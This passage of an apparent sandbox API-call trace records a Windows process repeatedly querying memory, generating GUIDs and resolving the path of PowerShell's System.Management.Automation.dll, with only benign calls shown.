	[0317.752] VirtualQuery (in: lpAddress=0x28b980, lpBuffer=0x28c840, dwLength=0x30 | out: lpBuffer=0x28c840*(BaseAddress=0x28b000, AllocationBase=0x210000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0317.753] VirtualQuery (in: lpAddress=0x28b8f0, lpBuffer=0x28c7b0, dwLength=0x30 | out: lpBuffer=0x28c7b0*(BaseAddress=0x28b000, AllocationBase=0x210000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0317.753] VirtualQuery (in: lpAddress=0x28b980, lpBuffer=0x28c840, dwLength=0x30 | out: lpBuffer=0x28c840*(BaseAddress=0x28b000, AllocationBase=0x210000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0317.753] CoCreateGuid (in: pguid=0x28d170 | out: pguid=0x28d170*(Data1=0x1b919481, Data2=0x32e1, Data3=0x484a, Data4=([0]=0xab, [1]=0x4a, [2]=0xcf, [3]=0x1, [4]=0xbb, [5]=0x54, [6]=0x82, [7]=0xed))) returned 0x0
	[0317.753] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x28c250, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0317.753] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x28c1a0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0317.753] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x28c1a0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0317.754] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x28c250, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0317.754] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x28c1a0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0317.754] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x28c1a0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0317.754] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x28c610, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0317.754] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x28c560, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0317.754] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x28c560, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0317.755] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x28bd00, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0317.755] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x28bc50, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0317.755] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x28bc50, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0317.755] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x28c610, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0317.755] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x28c560, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0317.755] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x28c560, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0317.755] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x28c610, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0317.756] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x28c560, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0317.756] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x28c560, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0317.756] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x28c480, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0317.756] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x28c3d0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0317.756] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x28c3d0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0317.756] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x28c2f0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0317.757] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x28c240, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0317.757] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x28c240, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0317.757] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x28c610, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0317.757] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x28c560, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0317.757] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x28c560, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0317.758] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x28c480, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0317.758] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x28c3d0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0317.758] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x28c3d0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0317.758] VirtualQuery (in: lpAddress=0x28b990, lpBuffer=0x28c850, dwLength=0x30 | out: lpBuffer=0x28c850*(BaseAddress=0x28b000, AllocationBase=0x210000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0317.758] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x28c480, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0317.758] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x28c3d0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0317.758] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x28c3d0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0317.759] VirtualQuery (in: lpAddress=0x28b990, lpBuffer=0x28c850, dwLength=0x30 | out: lpBuffer=0x28c850*(BaseAddress=0x28b000, AllocationBase=0x210000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0317.759] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x28c480, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0317.759] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x28c3d0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0317.759] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x28c3d0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0317.759] VirtualQuery (in: lpAddress=0x28b990, lpBuffer=0x28c850, dwLength=0x30 | out: lpBuffer=0x28c850*(BaseAddress=0x28b000, AllocationBase=0x210000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0317.759] VirtualQuery (in: lpAddress=0x28b8f0, lpBuffer=0x28c7b0, dwLength=0x30 | out: lpBuffer=0x28c7b0*(BaseAddress=0x28b000, AllocationBase=0x210000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0317.760] VirtualQuery (in: lpAddress=0x28b980, lpBuffer=0x28c840, dwLength=0x30 | out: lpBuffer=0x28c840*(BaseAddress=0x28b000, AllocationBase=0x210000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0317.760] VirtualQuery (in: lpAddress=0x28b8f0, lpBuffer=0x28c7b0, dwLength=0x30 | out: lpBuffer=0x28c7b0*(BaseAddress=0x28b000, AllocationBase=0x210000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0317.760] VirtualQuery (in: lpAddress=0x28b980, lpBuffer=0x28c840, dwLength=0x30 | out: lpBuffer=0x28c840*(BaseAddress=0x28b000, AllocationBase=0x210000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0317.760] VirtualQuery (in: lpAddress=0x28b980, lpBuffer=0x28c840, dwLength=0x30 | out: lpBuffer=0x28c840*(BaseAddress=0x28b000, AllocationBase=0x210000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0317.760] VirtualQuery (in: lpAddress=0x28b8f0, lpBuffer=0x28c7b0, dwLength=0x30 | out: lpBuffer=0x28c7b0*(BaseAddress=0x28b000, AllocationBase=0x210000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0317.760] VirtualQuery (in: lpAddress=0x28b980, lpBuffer=0x28c840, dwLength=0x30 | out: lpBuffer=0x28c840*(BaseAddress=0x28b000, AllocationBase=0x210000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0317.760] VirtualQuery (in: lpAddress=0x28b8f0, lpBuffer=0x28c7b0, dwLength=0x30 | out: lpBuffer=0x28c7b0*(BaseAddress=0x28b000, AllocationBase=0x210000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0317.760] VirtualQuery (in: lpAddress=0x28b980, lpBuffer=0x28c840, dwLength=0x30 | out: lpBuffer=0x28c840*(BaseAddress=0x28b000, AllocationBase=0x210000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0317.760] VirtualQuery (in: lpAddress=0x28b8f0, lpBuffer=0x28c7b0, dwLength=0x30 | out: lpBuffer=0x28c7b0*(BaseAddress=0x28b000, AllocationBase=0x210000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0317.761] VirtualQuery (in: lpAddress=0x28b980, lpBuffer=0x28c840, dwLength=0x30 | out: lpBuffer=0x28c840*(BaseAddress=0x28b000, AllocationBase=0x210000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0317.761] VirtualQuery (in: lpAddress=0x28b5c0, lpBuffer=0x28c480, dwLength=0x30 | out: lpBuffer=0x28c480*(BaseAddress=0x28b000, AllocationBase=0x210000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0317.761] VirtualQuery (in: lpAddress=0x28b8f0, lpBuffer=0x28c7b0, dwLength=0x30 | out: lpBuffer=0x28c7b0*(BaseAddress=0x28b000, AllocationBase=0x210000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0317.761] VirtualQuery (in: lpAddress=0x28b980, lpBuffer=0x28c840, dwLength=0x30 | out: lpBuffer=0x28c840*(BaseAddress=0x28b000, AllocationBase=0x210000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0317.761] VirtualQuery (in: lpAddress=0x28b8f0, lpBuffer=0x28c7b0, dwLength=0x30 | out: lpBuffer=0x28c7b0*(BaseAddress=0x28b000, AllocationBase=0x210000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0317.761] VirtualQuery (in: lpAddress=0x28b980, lpBuffer=0x28c840, dwLength=0x30 | out: lpBuffer=0x28c840*(BaseAddress=0x28b000, AllocationBase=0x210000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0317.761] CoCreateGuid (in: pguid=0x28d170 | out: pguid=0x28d170*(Data1=0x53142855, Data2=0x9f39, Data3=0x42a4, Data4=([0]=0x91, [1]=0xa5, [2]=0xb6, [3]=0x81, [4]=0xbf, [5]=0x35, [6]=0xfd, [7]=0xd8))) returned 0x0
	[0317.762] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x28c250, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0317.762] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x28c1a0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0317.762] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x28c1a0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0317.762] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x28c250, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0317.762] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x28c1a0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0317.762] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x28c1a0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0317.763] CoCreateGuid (in: pguid=0x28d170 | out: pguid=0x28d170*(Data1=0x4e69148f, Data2=0x404a, Data3=0x4813, Data4=([0]=0x81, [1]=0x50, [2]=0x27, [3]=0x8a, [4]=0x67, [5]=0xf0, [6]=0x83, [7]=0x4f))) returned 0x0
	[0317.763] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x28c250, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0317.763] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x28c1a0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0317.763] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x28c1a0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0317.763] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x28c250, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0317.763] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x28c1a0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0317.764] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x28c1a0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
